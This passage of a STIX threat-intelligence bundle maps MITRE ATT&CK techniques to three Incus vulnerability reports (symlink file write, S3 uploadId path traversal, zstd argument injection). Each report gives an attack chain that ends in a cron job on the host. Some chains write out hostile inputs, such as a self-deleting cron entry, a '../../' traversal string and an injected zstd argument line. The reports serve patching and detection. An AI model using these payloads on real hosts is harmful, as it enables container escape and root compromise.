      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0730f533-415d-59df-a048-449790ebb349",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93533bde-0fb7-5e65-9712-1ce3e6c7ff34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5dcff30c-e149-59d1-98ee-8c49290035fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f4e0a71e-9802-5acc-b960-1c51eeafa7b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Incus Vulnerability (CVE-2026-48752) Allows Host Arbitrary File Read/Write Leading to RCE",
      "description": "## Overview\n\nA critical vulnerability tracked as CVE-2026-48752 has been identified in Incus, a Linux container manager, affecting versions prior to 7.2.0. This flaw allows a malicious actor to perform arbitrary file read and write operations on the underlying host system. The exploitation vector involves crafting a malicious container image or instance backup that includes a top-level `templates` symlink. When Incus unpacks such an artifact, it fails to properly sanitize this symlink, enabling the attacker to redirect operations intended for the `templates` directory to any arbitrary path on the host, such as `/etc/cron.d`. This capability can be leveraged to inject malicious cron jobs or modify other sensitive system files, ultimately leading to arbitrary command execution with root privileges on the host. This vulnerability poses a significant risk to the integrity and security of systems running vulnerable Incus instances.\n\n## Attack Chain\n\n1.  The attacker crafts a malicious Incus container image or instance backup (`.tar` archive).\n2.  Within this archive, a top-level symlink named `templates` is created, pointing to a sensitive host directory (e.g., `/etc/cron.d`).\n3.  The attacker distributes this malicious image or backup, which is then imported or restored on a vulnerable Incus host using `incus image import` or `incus import`.\n4.  During the unpacking process, Incus's `archive.Unpack` (for images) or `rsync.LocalCopy` (for backups) follows the `templates` symlink due to insufficient sanitization.\n5.  The attacker then uses `incus config template create` or `incus config template edit` commands, targeting the newly imported malicious instance/image.\n6.  Due to the symlink, these `incus` commands inadvertently write arbitrary content to the sensitive host directory (e.g., creating a new cron job file in `/etc/cron.d`).\n7.  The malicious cron job is executed by the host's cron daemon, achieving arbitrary command execution, often as root, on the host system.\n8.  The attacker gains full control over the Incus host, enabling further malicious activities like data exfiltration or deploying additional malware.\n\n## Impact\n\nThe successful exploitation of CVE-2026-48752 leads to arbitrary file read and write capabilities on the Incus host system. This direct access to the host filesystem allows attackers to modify critical system files, inject malicious configurations (such as cron jobs), and ultimately achieve arbitrary command execution, often with root privileges. The consequences include complete system compromise, unauthorized data access, persistence mechanisms, and potential disruption of services. While no specific victim count or sectors are mentioned, any organization utilizing vulnerable Incus installations could be at risk of severe security breaches and operational disruption.\n\n## Recommendation\n\n*   Patch Incus immediately to version 7.2.0 or newer to address CVE-2026-48752 as advised by the vendor.\n*   Deploy the Sigma rule below to detect suspicious `incusd` write operations to sensitive system directories.\n*   Enable comprehensive `file_event` logging for Linux systems to capture modifications within critical directories like `/etc/cron.d/`, `/etc/`, `/bin/`, `/sbin/` by the `incusd` process.\n",
      "published": "2026-07-03T10:37:30Z",
      "labels": [
        "vulnerability",
        "rce",
        "symlink",
        "linux",
        "incus",
        "container"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vxp5-584q-c479"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5559b0ba-dfac-5b46-b236-371241a8d162",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--274672f6-f9b7-53a7-9b92-a5c9b55d9c3f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8748fd1-1598-5aa0-a5b5-d0bd8147bc3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--274672f6-f9b7-53a7-9b92-a5c9b55d9c3f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1053",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--260f8c9f-c7fa-5732-905b-866be9e16192",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--274672f6-f9b7-53a7-9b92-a5c9b55d9c3f",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--274672f6-f9b7-53a7-9b92-a5c9b55d9c3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incus S3 Multipart Upload Path Traversal Leading to RCE (CVE-2026-48753)",
      "description": "## Overview\n\nA critical path traversal vulnerability, tracked as CVE-2026-48753, has been identified in the Incus `incusd` daemon affecting versions prior to 7.1.0. This flaw resides within the S3 protocol's multipart upload endpoint, specifically in the handling of the `uploadId` parameter. Attackers can leverage this unsanitized parameter to inject path traversal sequences (e.g., `../../`) and write arbitrary files to sensitive locations on the host system. This arbitrary file write capability can be escalated to achieve persistent arbitrary command execution, for instance, by creating malicious cron jobs in `/etc/cron.d`. The successful exploitation of this vulnerability would grant an unauthenticated attacker the ability to execute commands with the privileges of the Incus service, posing a significant risk of full system compromise for affected Linux deployments utilizing Incus's S3 functionality.\n\n## Attack Chain\n\n1.  Attacker identifies a vulnerable Incus instance (version \u003c 7.1.0) with an exposed S3 API, typically via `incus config set core.storage_buckets_address`.\n2.  The attacker crafts a multipart S3 `PUT` request, targeting an S3 bucket configured on the vulnerable Incus instance.\n3.  The `uploadId` query parameter within the `PUT` request is maliciously manipulated, containing path traversal sequences such as `../../../../etc/cron.d`.\n4.  The request body is populated with the content of a malicious cron job entry, for example, `* * * * * root /bin/sh -c 'id \u003e /incus-s3-uploadid-bash-rce; rm -f /etc/cron.d/part-00001'`.\n5.  Due to the vulnerability in `internal/server/storage/s3/local/multipart.go`, Incus concatenates the unsanitized `uploadId` directly into the target file path during the upload process.\n6.  This results in an arbitrary file write on the host system, placing the malicious cron job content into a file like `/etc/cron.d/part-00001`.\n7.  The system's cron daemon periodically executes entries found in `/etc/cron.d`, triggering the newly created malicious job, leading to arbitrary command execution (e.g., `id \u003e /incus-s3-uploadid-bash-rce`).\n8.  The executed cron job also includes a command to delete itself (`rm -f /etc/cron.d/part-00001`), providing persistent remote code execution while attempting to remove forensic evidence.\n\n## Impact\n\nThe primary impact of CVE-2026-48753 is the ability for an unauthenticated attacker to achieve arbitrary file write on the host system where Incus is running. This directly enables arbitrary command execution, as demonstrated by the ability to install persistent cron jobs. Successful exploitation can lead to a complete compromise of the Incus host, allowing attackers to establish persistence, exfiltrate data, disrupt services, or pivot to other systems within the network. This vulnerability is critical due to its unauthenticated nature and the severe consequences of command execution.\n\n## Recommendation\n\n*   **Patch CVE-2026-48753 immediately** by upgrading your Incus installation to version 7.1.0 or later as advised by the advisory.\n*   **Deploy the Sigma rule in this brief** to your SIEM/EDR to detect exploitation attempts of CVE-2026-48753 by monitoring for suspicious S3 PUT requests.\n*   **Monitor web server access logs** for HTTP PUT requests to S3 endpoints that contain path traversal sequences (`../../` or `..%2F..%2F`) in the `uploadId` query parameter.\n*   **Enable comprehensive file integrity monitoring** for critical system directories like `/etc/cron.d`, `/tmp`, and other common locations for malicious file drops.\n",
      "published": "2026-07-03T10:36:22Z",
      "labels": [
        "path-traversal",
        "rce",
        "incus",
        "s3",
        "linux",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-ccjc-4qc3-jxqc"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d98c2c07-cacb-51a7-b4a7-03856c09fad8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: /etc/cron.d/incus-zstd-rce",
      "pattern": "[x-ti-bot:file_path = '/etc/cron.d/incus-zstd-rce']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:35:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc42051a-20bb-5604-bd3a-69080c4c893f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "indicator--d98c2c07-cacb-51a7-b4a7-03856c09fad8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c0c3b70e-091e-5197-83be-169da2b7176b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: /var/lib/incus/.../payload",
      "pattern": "[x-ti-bot:file_path = '/var/lib/incus/.../payload']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:35:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a9291dd7-46c1-53e7-82fd-2a77a279df0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "indicator--c0c3b70e-091e-5197-83be-169da2b7176b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--247fd488-905b-5c58-b89e-a2f601da93ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe5c0659-5817-59bc-a508-a0759deb2fd2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f3dff130-7d13-515b-8788-ea7ef914a99e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse of Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00307f72-949a-567e-b2a3-2075a88d290d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--151f4323-cd14-561a-b0fd-6d39909b7974",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9fb01792-22fa-5f33-a701-d2a1bec79cec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incus Argument Injection Vulnerability Leads to Arbitrary File Write and Command Execution",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-48755, affects Incus versions prior to 7.2.0, stemming from an argument injection flaw in its backup compression algorithm processing. The flaw allows an authenticated attacker to manipulate the `compression_algorithm` parameter, injecting arbitrary command-line arguments into the `zstd` compressor execution. This enables an arbitrary file write (AFW) operation on the host system where Incus is running. Attackers can leverage this AFW to write malicious content to sensitive locations, such as cron job directories (`/etc/cron.d/`), thereby achieving arbitrary command execution (ACE). This vulnerability is particularly dangerous as it provides a pathway from a compromised Incus instance to full system compromise of the host. Defenders should prioritize patching and monitoring for suspicious `zstd` command executions and unexpected file writes in system configuration paths.\n\n## Attack Chain\n\n1.  An authenticated attacker (e.g., a user with Incus client certificate access to the API) gains control over an Incus instance.\n2.  The attacker uploads a malicious payload (e.g., a reverse shell script or system command) into the compromised Incus instance, accessible from the host filesystem.\n3.  The attacker crafts a malicious `compression_algorithm` string containing argument injection payloads, such as `zstd -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- /var/lib/incus/.../payload`.\n4.  The attacker initiates a direct backup request to the Incus API for the compromised instance, specifying the crafted malicious `compression_algorithm`.\n5.  Incus, due to improper validation, constructs and executes a command similar to `exec.Command(\"zstd\", \"-c\", \"-d\", \"-f\", \"--pass-through\", \"-o\", \"/etc/cron.d/incus-zstd-rce\", \"--\", \"/var/lib/incus/.../payload\")`.\n6.  The `zstd` command's argument injection leads to an arbitrary file write, copying the attacker-controlled payload from within the Incus instance to `/etc/cron.d/incus-zstd-rce` on the host system.\n7.  The newly created cron job on the host system is executed by the cron daemon at the specified interval, resulting in arbitrary command execution on the Incus host.\n8.  The executed command establishes persistence or performs further malicious actions, such as data exfiltration or deploying additional malware.\n\n## Impact\n\nThe successful exploitation of CVE-2026-48755 leads to an arbitrary file write on the host operating system, which attackers can immediately leverage for arbitrary command execution. This allows a privileged user within an Incus instance to escalate privileges to root on the underlying host, circumventing containerization. Such a compromise grants the attacker full control over the Incus host, potentially impacting all other instances running on that server, and facilitating lateral movement within the network. This vulnerability affects Incus users running versions prior to 7.2.0, with potential for widespread compromise in environments where Incus is used for virtualization or container management.\n\n## Recommendation\n\n*   Patch CVE-2026-48755 by upgrading all Incus installations to version 7.2.0 or higher immediately.\n*   Deploy the provided Sigma rule \"CVE-2026-48755: Incus Zstd Argument Injection Attempt\" to your SIEM to detect suspicious execution of `zstd` with potential argument injection patterns.\n*   Enable `process_creation` logging for Linux systems to capture command-line arguments of processes like `zstd`.\n*   Monitor for the creation of new files in system cron directories, specifically `/etc/cron.d/incus-zstd-rce`, using file integrity monitoring or `file_event` logging, as this indicates a successful arbitrary file write.\n*   Block the arbitrary file write target `/etc/cron.d/incus-zstd-rce` from being created by non-system processes if possible, or create a `file_event` rule to alert on its creation.\n",
      "published": "2026-07-03T10:35:11Z",
      "labels": [
        "argument-injection",
        "arbitrary-file-write",
        "remote-code-execution",
        "container-escape",
        "linux"
      ],
      "object_refs": [
        "indicator--d98c2c07-cacb-51a7-b4a7-03856c09fad8",
        "indicator--c0c3b70e-091e-5197-83be-169da2b7176b",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v6mj-8pf4-hhw4"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3a000c78-1b3e-5a96-b161-39d6e3b8a086",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mcp-tool-shop-org/backpropagate/blob/main/CHANGELOG.md#120---2026-05-23",
      "pattern": "[url:value = 'https://github.com/mcp-tool-shop-org/backpropagate/blob/main/CHANGELOG.md#120---2026-05-23']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:32:41Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58562aaa-0363-5722-acd1-b43b6509a24d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "indicator--3a000c78-1b3e-5a96-b161-39d6e3b8a086"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--417eeacd-413a-527c-8180-eef461e0b331",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:32:41Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--253915e4-dad0-5dbd-891e-b8d1fdfbf838",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "indicator--417eeacd-413a-527c-8180-eef461e0b331"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1d86fdd8-a530-5da4-a090-2acff72d3257",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: huggingface.co",
      "pattern": "[domain-name:value = 'huggingface.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:32:41Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a6f85a7-d866-5f2f-b6c0-ce0cca4bc1de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "indicator--1d86fdd8-a530-5da4-a090-2acff72d3257"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9284595a-b543-5dda-878d-fe8837ae527a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86589ea5-c9ec-5253-aafa-4a3ab4015974",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10425b0c-629b-5290-86fc-c5eb1f9d754e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Cloud Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7344a558-08f7-532a-8fc5-03286b9dfd6f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e85d2355-d6b8-5757-9051-d9d5c36942bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfbada7c-3517-5f5e-bbfc-5409c8212241",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
